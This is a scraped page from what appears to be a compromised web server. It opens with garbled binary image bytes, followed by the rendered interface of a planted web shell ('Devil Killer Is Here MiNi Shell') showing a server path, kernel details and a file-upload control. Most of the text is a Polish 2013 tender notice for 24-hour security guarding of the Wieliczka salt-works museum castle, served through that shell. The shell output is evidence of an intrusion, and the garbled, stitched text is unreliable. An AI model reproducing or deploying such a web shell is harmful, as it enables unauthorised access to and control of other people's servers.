JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/70995-N-2013.html

<p class="kh_header"><b>Wieliczka: CAŁODOBOWA OCHRONA OSÓB I MIENIA W ZESPOLE ZAMKU ŻUPNEGO MUZEUM ŻUP  KRAKOWSKICH  WIELICZKA</b><br>
<b>Numer ogłoszenia: 70995 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Żup Krakowskich Wieliczka , ul. Zamkowa 8, 32-020 Wieliczka, woj. małopolskie, tel. 012 2783266, 4221947, faks 012 2783028.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CAŁODOBOWA OCHRONA OSÓB I MIENIA W ZESPOLE ZAMKU ŻUPNEGO MUZEUM ŻUP  KRAKOWSKICH  WIELICZKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.OPIS  PRZEDMIOTU  ZAMÓWIENIA. Całodobowa ochrona i dozór pełnione przez wszystkie dni tygodnia - w tym soboty, niedziele i dni świąteczne, obiektów Zabytkowego Zespołu Zamku Żupnego Muzeum Żup Krakowskich Wieliczka w Wieliczce ul Zamkowa 8 oraz osób i mienia znajdujących się na terenie Zespołu  poprzez bezpośrednią ochronę fizyczną, sprawowaną na  posterunku -1 stały i 1 obchodowy, przez dwóch pracowników ochrony posiadających licencję pracownika ochrony fizycznej I lub II stopnia. Pracownicy ochrony nie mogą być karani, i nie mogą posiadać orzeczenia o niepełnosprawności.Zakres prac obejmuje wykonanie: -ochrona osób i mienia oraz dozór obiektu posterunek 1-osobowy stały i 1-osobowy obchodowy, 24 godzinny. Ze względów technicznych w godzinach  7.00  do 15.00 we wszystkie dni tygodnia posterunek stały obsadzany będzie przez etatowych pracowników Muzeum. Granice chronionego obiektu stanowią trzy główne budynki: - Budynek Północny Administracja, Archiwum, Biblioteka, Tajna Kancelaria, Centrala telefoniczna oraz Sklep z pamiątkami, - Budynek Środkowy - Zamek, Magazyn Sztuki, Wystawa Solniczek, Sala Wystaw Czasowych, Sala Gotycka, - Baszta i Rezerwat górniczy, - Budynek Południowy, Pracownia Plastyczna, Introligatorska, Pokoje Gościnne,Garaże,StacjiTransformatorowa, - mur z materiału ceramicznego - pomiędzy budynkami od strony zachodniej, północnej i wschodniej - w którym znajdują się: - dwie bramy zamykane od strony wschodniej, - furtka  od strony południowej. - Miejscem stałym pełnienia służby jest  portiernia usytuowana pomiędzy budynkami Zamku Środkowego i Północnego. Ochrona osób i mienia oraz dozór obiektów posterunek 1-osobowy  stały i 1-osobowy   obchodowy, 24 godzinny w granicach chronionych obiektów Zespołu Zamku Żupnego przy ul.  Zamkowej 8,  dozór wizyjny,  przyjmowanie osób korzystających z pokoi gościnnych dokonywania zameldowania oraz pobierania opłaty za pokój zgodnie z dyspozycją administracji   Muzeum,  dokonywanie obchodu wewnątrz budynków Zabytkowego Zespołu Zamku Żupnego  posterunek 1-osobowy obchodowy wg ustalonego z Zamawiającym  harmonogramu i zwracanie uwagi na wszelkie usterki, jakie mogą zagrażać bezpieczeństwu obiektu np. awaria instalacji elektrycznej, wodociągowej, gazowej, grzewczej i kanalizacyjnej, przebywanie osób nieuprawnionych oraz inne zagrożenia, wygaszanie świateł, sprawdzanie zamknięcia drzwi i okien w pomieszczeniach budynku po opuszczeniu ich przez pracowników,  dokonywanie obchodu zewnętrznego wokół budynków Zabytkowego Zespołu Zamku Żupnego wg ustalonego harmonogramu,  całodobowy monitoring pomieszczeń oraz otoczenia budynków Zamawiającego z wykorzystaniem systemu monitoringu Zamawiającego oraz wykonywanie pieszych obchodów wewnątrz i na zewnątrz budynków wg przyjętego harmonogramu,  sprawdzanie stanu wszelkich zamknięć i zabezpieczeń,  sprawdzanie prawidłowości zamknięcia drzwi i okien po opuszczeniu chronionych obiektów przez pracowników Muzeum. Sprawdzanie bram wjazdowych i oświetlenia,  sprawdzanie uprawnień pojazdów wjeżdżających na teren Muzeum do wjazdu i przebywania na tym terenie,  ustalanie uprawnień osób do przebywania na obiektach chronionych, legitymowanie osób wchodzących na teren obiektów Muzeum poza godzinami pracy oraz w sytuacjach zagrożenia, w celu ustalenia ich tożsamości,  przyjmowanie oraz wydawanie kluczy wraz z ich ewidencją w przypadku pomieszczeń  specjalnych,  wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionych obiektów albo stwierdzenia zakłócenia porządku,  niezwłoczne reagowanie pracowników Służby Ochrony na sygnały zagrożenia wskazujące na konieczność interwencji. Podejmowanie interwencji w przypadku zagrożeń osób i mienia, z zachowaniem obowiązujących w tym zakresie przepisów,  ujęcie osób stwarzających w sposób bezpośredni zagrożenie dla życia lub zdrowia ludzkiego, a także dla chronionego mienia, w celu niezwłocznego przekazania tych osób Policji,  wzywanie , w uzasadnionych przypadkach, własnej grupy interwencyjnej,  współdziałanie z Policją oraz pracownikami Muzeum w zakresie ochrony obiektów,  stosowanie się do obowiązującego w ochranianych obiektach Zamawiającego Wewnętrznych Regulaminów  Bezpieczeństwa i Porządku,  pisemne zgłaszanie Zamawiającemu wszelkich braków lub naruszeń odnośnie stanu zabezpieczenia mienia na ochranianych obiektach,  prowadzenie wymaganej dokumentacji służby. -Wykonawca zobowiązany będzie do przedstawienia do zatwierdzenia przez Dyrektora Muzeum projektu -Planu ochrony MŻKW- w ciągu 14 dni od dnia podpisania umowy. Przedstawiony do zatwierdzenia projekt musi być zgodny z obowiązującymi przepisami prawa, wewnętrznymi regulaminami i zarządzeniami uwzględniać charakter obiektu i jego wyposażenie techniczne służące do zabezpieczania osób i mienia znajdujących się w obszarze chronionym Zespołu Zamku Zupnego. Dyrektor Muzeum w ciągu 7 dni od dnia otrzymania projektu, zatwierdzi przedstawione propozycje, może je uzupełnić, albo przedstawić wykonawcy własną wersję Planu Ochrony. - Do czasu akceptacji Planu Ochrony, Wykonawca zapewni ochronę siedziby Zamawiającego zgodnie z postanowieniami niniejszej SIWZ. - Wykonawca zapewni pracownikom ochrony jednolite, estetyczne i reprezentacyjne umundurowanie, odpowiednio do powagi instytucji kultury (np. kurtka ocieplana, czapka, bluza obiektowa , koszula, krawat, klasyczne spodnie). Pracownicy w czasie realizacji zadań będą nosić identyfikatory z nazwą firmy oraz z danymi personalnymi pracownika i będą wyposażeni w środki łączności zewnętrznej. - Zamawiający zastrzega sobie prawo do żądania zmiany każdego z pracowników wykonawcy, który przez swoje zachowanie i jakość wykonywanej pracy dał powód do uzasadnionych uwag i skarg. - W związku z koniecznością wdrożenia się przez pracowników ochrony w obowiązujące u Zamawiającego procedury i formalności, wskazanym jest ustalenie stałych pracowników ochrony świadczących usługi u Zamawiającego. O wszelkich zmianach składu osobowego pracowników Zamawiający będzie niezwłocznie informowany. Zamawiający zastrzega sobie prawo akceptacji przedłożonego przez Wykonawcę składu osobowego pracowników ochrony oraz ewentualnych zmian wprowadzanych w nim przez Wykonawcę.  Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej Zabytkowego Zespołu Zamku Żupnego miejsca będącego przedmiotem postępowania, w dniu umówionym z Zamawiającym, w celu uzyskania wszelkich dodatkowych informacji, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia.  Zamawiający zastrzega, zgodnie z art. 36 ust.5 ustawy prawo zamówień publicznych, iż ze względu na specyfikę przedmiotu zamówienia, zamówienie w całości i w części nie może być powierzone podwykonawcom..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza w niniejszym postępowaniu, zamówień uzupełniających, jeżeli z przyczyn związanych z prowadzoną działalnością Zamawiającego niezbędne będzie chwilowe zwiększenie liczby pracowników. Zamówienia uzupełniające zgodnie z art. 67 ust. 1 pkt 6 ustawy będą polegały na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca potwierdzi spełnienie warunku udziału w postępowaniu jeśli wykaże, iż: -  prowadzi działalność gospodarczą na podstawie koncesji wydanej przez MSWiA w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej oraz zabezpieczenia technicznego, zgodnie z art.3,pkt.1 Ustawy z dnia 22.08.1997 r. o ochronie osób i mienia (tekst jedn. Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca potwierdzi spełnienie warunku udziału w postępowaniu jeśli wykaże, iż: -  wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje ) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania - co najmniej 3 usług w zakresie wykonywania ochrony obiektów i mienia w obiektach muzealnych nieprzerwanie nie krócej niż 12 miesięcy każda o wartości min. 250 000 zł brutto każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca potwierdzi spełnienie warunku udziału w postępowaniu jeśli wykaże, iż:- dysponuje co najmniej dwoma własnymi grupami interwencyjnymi  w tym co najmniej jedną zlokalizowaną na terenie miasta Wieliczki, której czas dojazdu do obiektu Zamawiającego od momentu zgłoszenia nie przekroczy 7 minut, - grupy interwencyjne mają być w pełni wyposażone w broń ostrą i środki przymusu bezpośredniego, przemieszczające się w charakterystycznie dla Wykonawcy oznakowanych pojazdach, posiadających łączność radiowo-dyspozytorską i GSM (zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji, poz. 1462 z dnia 21 października 2011r.), przy czym grupa interwencyjna ma przybyć do obiektów na wywołany alarm, 3. dysponuje własną całodobową stacją monitorowania alarmów typu dyspozytorskiego (uzbrojone stanowisko interwencyjne zgodnie z rozporządzeniem MSWiA z dnia 21 października 2011r. w sprawie zasad uzbrojenia specjalistycznych uzbrojonych formacji ochronnych i warunków przechowywania oraz ewidencjonowania broni i amunicji - Dz. U., nr 245 poz. 1462), zdolną do odbioru i przetwarzania sygnałów alarmowych drogą telefoniczną automatycznie komutowaną i drogą GSM,4. dysponuje co najmniej dwoma radiotelefonami działającymi na wydzielonym paśmie Wykonawcy.5. dysponuje magazynem broni, zabezpieczonym zgodnie z wymogami Rozporządzenia MSWiA z 6.08.1998 r. w sprawie zasad uzbrojenia specjalistycznych uzbrojonych formacji ochronnych i warunków przechowywania oraz ewidencjonowania broni i amunicji,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca potwierdzi spełnianie warunku udziału w postępowaniu, jeżeli wykaże, iż pracownicy ochrony przewidziani do realizacji zamówienia:- posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, tj. co najmniej 12 miesięczne w świadczeniu usług ochrony fizycznej i mienia,
- posiadają licencje I lub II stopnia, posiadają badania lekarskie potwierdzające ich zdolność do wykonywania czynności ochrony (Zamawiający nie dopuszcza możliwości zatrudnienia osób z orzeczonym stopniem niepełnosprawności oraz wymaga potwierdzenia ich niekaralności), - posiadają licencje pracownika zabezpieczenia technicznego (min. 2 pracowników), w tym co najmniej 1 posiadający licencję  pracownika zabezpieczenia technicznego II stopnia. - wyposażeni będą w środek łączności umożliwiający kontakt w razie zaistniałej konieczności (telefon komórkowy), pilot antynapadowy umożliwiający wezwanie własnej grupy interwencyjnej, jednolite umundurowanie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego. - Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej z tytułem prowadzonej działalności, na kwotę nie mniejsza niż 500 000 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowany przedmiot zamówienia odpowiada określonym przez Zamawiającego wymaganiom, Wykonawcy przedstawią: - 1.zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z systemem zapewnienia jakości, opartym na normach europejskich (np. EN ISO 9001z2008). Załączony do oferty dokument (np. certyfikat) musi być ważny (aktualny) oraz potwierdzać - zgodnie z odpowiednią normą europejską - wdrożenie i skuteczne realizowanie systemu zapewnienia jakości usług ochrony osób i mienia, świadczonych przez Wykonawcę. Wykonawca może zamiast ww. zaświadczenia złożyć inny dokument potwierdzający odpowiednie stosowanie przez niego równoważnych środków zapewnienia jakości usług ochrony osób i mienia.2. Pozwolenie Prezesa Urzędu Komunikacji Elektronicznej na używanie radiowych urządzeń nadawczo-odbiorczych pracujących w służbie radiokomunikacji ruchomej lądowej typu dyspozytorskiego, 